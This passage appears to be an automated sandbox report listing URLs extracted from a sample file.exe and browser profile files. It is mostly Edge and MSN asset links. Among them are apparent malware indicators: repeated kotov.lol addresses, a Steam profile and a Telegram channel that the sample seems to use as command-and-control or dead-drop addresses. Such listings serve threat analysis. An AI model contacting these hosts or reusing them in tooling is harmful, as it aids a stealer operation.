Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log4.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr, HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log4.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://gaana.com/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: BGHJEB.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000002.2643455185.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/
Source: file.exe, 00000000.00000002.2643455185.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/)
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/6
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/:
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/L
Source: file.exe, 00000000.00000003.1524987494.0000000000856000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1476164731.0000000000856000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1449824487.0000000000857000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1500882253.0000000000857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/S1
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/T
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/Z
Source: file.exe, 00000000.00000003.1524987494.0000000000856000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1476164731.0000000000856000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1449824487.0000000000857000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1500882253.0000000000857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/an
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/b
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kotov.lol/p
Source: file.exe, 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://kotov.lol0d52d366a329a6
Source: file.exe, 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://kotov.lolAKEBFIJECG--
Source: file.exe, 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://kotov.lolDGCBFIIJ
Source: file.exe, 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://kotov.lolFHJJJJEC
Source: file.exe, 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://kotov.lolPUSAFIOL
Source: file.exe, 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://kotov.lolipart/form-data;
Source: file.exe, 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://kotov.lolpData
Source: file.exe, 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://kotov.loltosh;
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://m.kugou.com/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://m.soundcloud.com/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://m.vk.com/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: Cookies.11.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.11.dr	String found in binary or memory: https://msn.comXIDv10
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://music.amazon.com
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://music.apple.com
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log5.10.dr, 2cc80dabc69f58b6_0.10.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log10.10.dr, 000003.log0.10.dr	String found in binary or memory: https://ntp.msn.com/
Source: 000003.log10.10.dr	String found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.10.dr	String found in binary or memory: https://ntp.msn.com/_default
Source: 000003.log10.10.dr, 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13377353273505919.10.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager.10.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.10.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://open.spotify.com
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://srtb.msn.com/
Source: file.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199803837316
Source: file.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199803837316g88paMozilla/5.0
Source: file.exe, 00000000.00000002.2650845169.000000000400D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000002.2650845169.000000000400D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000002.2643455185.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: file.exe	String found in binary or memory: https://t.me/gv4dlp
Source: file.exe, 00000000.00000002.2643455185.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/gv4dlp2d1
Source: file.exe, 00000000.00000002.2643455185.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/gv4dlpW
Source: file.exe	String found in binary or memory: https://t.me/gv4dlpg88paMozilla/5.0
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://tidal.com/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://vibe.naver.com/today
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: file.exe, 00000000.00000003.1418724395.000000000085E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://web.telegram.org/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://web.whatsapp.com
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: file.exe, 00000000.00000002.2645583366.000000000372F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2647094626.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, BGHJEB.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.deezer.com/
Source: file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: content.js.10.dr, content_new.js.10.dr	String found in binary or memory: https://www.google.com/chrome
Source: file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1926aa11-c77c-465f-b97d-a31092fa34d6.tmp.11.dr	String found in binary or memory: https://www.googleapis.com
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.instagram.com
Source: file.exe, 00000000.00000002.2645583366.000000000372F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2647094626.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, BGHJEB.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.last.fm/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.messenger.com
Source: file.exe, 00000000.00000002.2650845169.000000000400D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000002.2650845169.000000000400D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: file.exe, 00000000.00000002.2650845169.000000000400D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2650845169.000000000400D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
